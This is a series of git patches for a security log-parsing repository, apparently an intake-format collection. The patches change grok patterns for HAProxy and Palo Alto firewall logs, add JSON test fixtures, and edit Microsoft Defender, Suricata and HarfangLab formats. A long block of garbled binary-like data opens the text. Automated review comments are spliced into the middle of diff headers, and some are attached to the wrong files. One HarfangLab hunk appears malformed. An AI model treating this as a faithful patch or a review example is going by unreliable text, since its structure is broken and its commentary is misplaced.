z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& 
zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) 
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ Date: Tue, 3 Dec 2024 17:57:02 +0100 Subject: [PATCH 307/317] chore(Microsoft): rename the Microsoft Defender XDR format --- Microsoft/microsoft-365-defender/_meta/manifest.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml index 1c858333a..d2e9192ce 100644 --- a/Microsoft/microsoft-365-defender/_meta/manifest.yml +++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml 
@@ -1,11 +1,11 @@
 uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f
-name: Microsoft 365 Defender
+name: Microsoft Defender XDR / Microsoft 365 Defender
 slug: microsoft-365-defender
 automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef
 automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac
 description: >-
- Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications.
+ Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications.
 Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
From c03be93f20e239d55f6dc312cc7579e47d1c92a4 Mon Sep 17 00:00:00 2001
From: rombernier
Date: Wed, 4 Dec 2024 16:49:13 +0100
Subject: [PATCH 308/317] update HA procy
---
 HAProxy/haproxy/CHANGELOG.md | 4 +++
 HAProxy/haproxy/ingest/parser.yml | 2 +-
 HAProxy/haproxy/tests/access4.json | 45 ++++++++++++++++++++++++++++++
 3 files changed, 50 insertions(+), 1 deletion(-)
 create mode 100644 HAProxy/haproxy/tests/access4.json
diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md
index 60e2c8a26..9896476a3 100644
--- a/HAProxy/haproxy/CHANGELOG.md
+++ b/HAProxy/haproxy/CHANGELOG.md
@@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ## [Unreleased]
+## 2024-12.04 - 1.0.1
+
+- Add support for aktci at the end of the log
+
 ## 2024-03.04 - 1.0.0
 ### Added
diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml
index 98783cd3d..e1f5a3c88 100644
--- a/HAProxy/haproxy/ingest/parser.yml
+++ b/HAProxy/haproxy/ingest/parser.yml
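Review bot: The rewritten `description` line carries over the grammatical slip `a entreprise defense suite`; since the line is being rewritten anyway, `Microsoft Defender XDR is an enterprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications.` would fix it at no extra cost. The `name` now lists both product names while `slug` stays `microsoft-365-defender`; that is the right call if the slug is a stable identifier, but worth a one-line comment on the slug saying it is intentionally unchanged so the next rename does not touch it.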
@@ -14,7 +14,7 @@ pipeline:
 ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9])
 HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
 TLS_PROTOCOL: "TLS"
- HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?'
+ HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?'
 - name: json
 filter: "{{grok.message.json_msg | length > 0}}"
diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json
new file mode 100644
index 000000000..89630f6bc
--- /dev/null
+++ b/HAProxy/haproxy/tests/access4.json
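Review bot: The new trailing group captures the address into `aktci`, but nothing in this hunk maps it to an output field, and the fixture added further down in this patch (access4.json) lists only the source address under `related.ip`, so the capture looks dead unless a stage outside the hunk consumes it. If the value is meant to be the client address seen behind the proxy it needs an explicit mapping plus an assertion in the fixture; if it is only there to let the line parse, a non-capturing `( aktci:\"%{IP}\")?` states that intent. `aktci` is also an opaque name, presumably a site-specific log-format addition; a short comment above the `HAPROXYHTTPBASE` line naming the HAProxy option that emits it would help the next reader. The enclosing `pipeline:` mapping continues outside the hunk.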
@@ -0,0 +1,45 @@
+{
+ "input": {
+ "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "HAProxy",
+ "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9"
+ }
+ }
+ },
+ "expected": {
+ "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n",
+ "event": {
+ "kind": "access"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 1060,
+ "status_code": 200
+ },
+ "version": "1.1"
+ },
+ "related": {
+ "ip": [
+ "90.83.225.109"
+ ]
+ },
+ "source": {
+ "address": "90.83.225.109",
+ "ip": "90.83.225.109",
+ "port": 54761
+ },
+ "tls": {
+ "version": "1.2",
+ "version_protocol": "TLS"
+ },
+ "url": {
+ "original": "/path/get/resource",
+ "path": "/path/get/resource"
+ }
+ }
+}
\ No newline at end of file
From d6c0b58dcc4ebd765b594f8bc1121b35800a695b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Fri, 6 Dec 2024 10:44:29 +0100
Subject: [PATCH 309/317] Fix quotes problem in reason message
---
 .../paloalto-ngfw/ingest/parser.yml | 2 +-
 .../tests/test_system_event_13.json | 74 +++++++++++++++++++
 2 files changed, 75 insertions(+), 1 deletion(-)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 944713355..c6cf58abe 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
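Review bot: The fixture puts publicly routable addresses (`90.83.225.109`, `46.193.65.202`) into a file that ships in a public repository; test input is better drawn from the RFC 5737 documentation ranges (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`) so nothing that could be mistaken for a real client ever appears in the corpus, and the same applies to the port and host values if they were copied from a live log. The `expected` object also asserts nothing about the trailing `aktci:` value even though the input carries one, so this test passes whether or not the new pattern group matched; if the value is intentionally dropped, the fixture cannot show that, and if it is meant to be kept, an expectation for it is missing.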
@@ -626,7 +626,7 @@ pipeline:
 AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
 REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
 REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}"
- REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
+ REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?"
 REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
 REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'
 filter: '{{parsed_event.message.get("EventDescription") != None}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
new file mode 100644
index 000000000..780d2a093
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
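Review bot: The optional quotes fix the quoted form of the message, but `%{WORD:user}` (`\w+`) still rejects any quoted username containing a dot, hyphen, `@` or backslash (`first.last`, `DOMAIN\user`), and `%{WORD:auth_profile}` / `%{WORD:server_profile}` likewise reject hyphenated profile names; in every such case REASON3 fails as a whole and no field at all is extracted from the event. Now that the values are delimited by the quotes and by fixed literal text, `'?%{DATA:user}'? from '?%{IP:source_ip}'?,` (and the same `DATA` substitution for the two profile fields) accepts the wider character set without losing the anchoring. The new fixture only exercises `'test000555'`, which `WORD` already accepts, so it does not demonstrate the quote handling for the names this change is most likely to meet in practice. The enclosing grok `pattern_definitions` mapping starts outside the hunk.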
@@ -0,0 +1,74 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Palo Alto NGFW",
+ "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+ }
+ },
+ "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00"
+ },
+ "expected": {
+ "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00",
+ "event": {
+ "category": [
+ "authentication"
+ ],
+ "dataset": "system",
+ "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-26T21:10:01.627000Z",
+ "action": {
+ "name": "auth-success",
+ "type": "auth"
+ },
+ "destination": {
+ "address": "1.7.4.2",
+ "ip": "1.7.4.2"
+ },
+ "log": {
+ "hostname": "FWPAN00",
+ "level": "informational",
+ "logger": "system"
+ },
+ "observer": {
+ "name": "FWPAN00",
+ "product": "PAN-OS",
+ "serial_number": "02410100000000"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "EventID": "auth-success",
+ "Threat_ContentType": "auth",
+ "authetification": {
+ "profile": "FWPA"
+ },
+ "server": {
+ "profile": "RADIUS_RSA"
+ },
+ "vsys": "shared"
+ },
+ "related": {
+ "ip": [
+ "1.2.5.5",
+ "1.7.4.2"
+ ],
+ "user": [
+ "test000555"
+ ]
+ },
+ "source": {
+ "address": "1.2.5.5",
+ "ip": "1.2.5.5"
+ },
+ "user": {
+ "name": "test000555"
+ }
+ }
+}
\ No newline at end of file
From 4c7891951ac1ac6dcfc605331cda92476af2c577 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Fri, 6 Dec 2024 10:48:35 +0100
Subject: [PATCH 310/317] Apply linter
---
 .../paloalto-ngfw/tests/test_system_event_13.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
index 780d2a093..b4429340a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
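Review bot: The expected output asserts the profile under `paloalto.authetification.profile`, which reads as a misspelling of "authentication"; if that is the key the existing parser and fields.yml already emit (both outside this patch) the fixture is right to pin it and a rename would be a breaking change for saved searches, but it is worth confirming the spelling is inherited rather than a typo that a new test is now locking in. The rest of the expectation is internally consistent with the input: the `+01:00` offset is folded into `2024-11-26T21:10:01.627000Z`, and every address from the message appears in `related.ip`.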
@@ -1,12 +1,12 @@ { "input": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", "sekoiaio": { "intake": { "dialect": "Palo Alto NGFW", "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" } - }, - "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00" + } }, "expected": { "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", From e7c29187f511ca9f20cce388986d707577befc53 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 11:17:39 +0100 Subject: [PATCH 311/317] fix(HAproxy): change the way to handle additional information --- HAProxy/haproxy/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index e1f5a3c88..557604c8a 100644 --- a/HAProxy/haproxy/ingest/parser.yml 
+++ b/HAProxy/haproxy/ingest/parser.yml @@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}' - name: json filter: "{{grok.message.json_msg | length > 0}}" From b597fe1c7d554917f5fe9b702553d9a03c05a535 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 12:31:20 +0100 Subject: [PATCH 312/317] fix(Suricata): fix smart-description --- Suricata/suricata/_meta/smart-descriptions.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json index b330a23c1..432cf533d 100644 
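Review bot: The trailing `%{GREEDYDATA}` in the new HAPROXYHTTPBASE pattern swallows the extra information without naming it, so the address the old `( aktci:\"%{IP:aktci}\")?` group captured is no longer extracted at all, and anything in fields.yml or a later stage that reads `aktci` now stays empty. If that value is still wanted, capture the tail into a named field and parse it in a following stage, e.g. `%{GREEDYDATA:additional_info}` (the field name is a placeholder to align with fields.yml); if dropping it is intentional, the commit message should say so. A fixture with a log line carrying the extra information would document whichever behaviour is chosen.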
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -151,8 +151,7 @@
"value": "query"
},
{
- "field": "action.type",
- "value": "dns"
+ "field": "dns.question.name"
}
],
"relationships": [
From e6a207c4cb874eac232f7f121382031860ed1ed1 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 14:16:24 +0100 Subject: [PATCH 313/317] Fis on agent.id field for harfanglab
--- HarfangLab/harfanglab/ingest/parser.yml | 4 ++++ HarfangLab/harfanglab/tests/threat_critical.json | 1 + HarfangLab/harfanglab/tests/threat_log.json | 1 + 3 files changed, 6 insertions(+)
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 5050c7429..96338037d 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -142,6 +142,10 @@ stages:
organization.id: "{{json_event.message.tenant}}"
url.original: "{{json_event.message.details_url_request.url}}"
+ - set:
+ agent.id: "{{json_event.message.agents[0].agent_id}}"
+ filter: "{{json_event.message.agents | length > 0}}"
+ network_info:
actions:
 - set:
diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json
index 94e83a1fd..e9b50e3db 100644
--- a/HarfangLab/harfanglab/tests/threat_critical.json
+++ b/HarfangLab/harfanglab/tests/threat_critical.json
@@ -10,6 +10,7 @@
"start": "2024-03-19T09:21:00Z"
},
"agent": {
+ "id": "af5e2f63-becd-4660-ade8-30d04c0dd044",
"name": "harfanglab"
},
"harfanglab": {
diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json
index dcab41c28..233ffd066 100644
--- a/HarfangLab/harfanglab/tests/threat_log.json
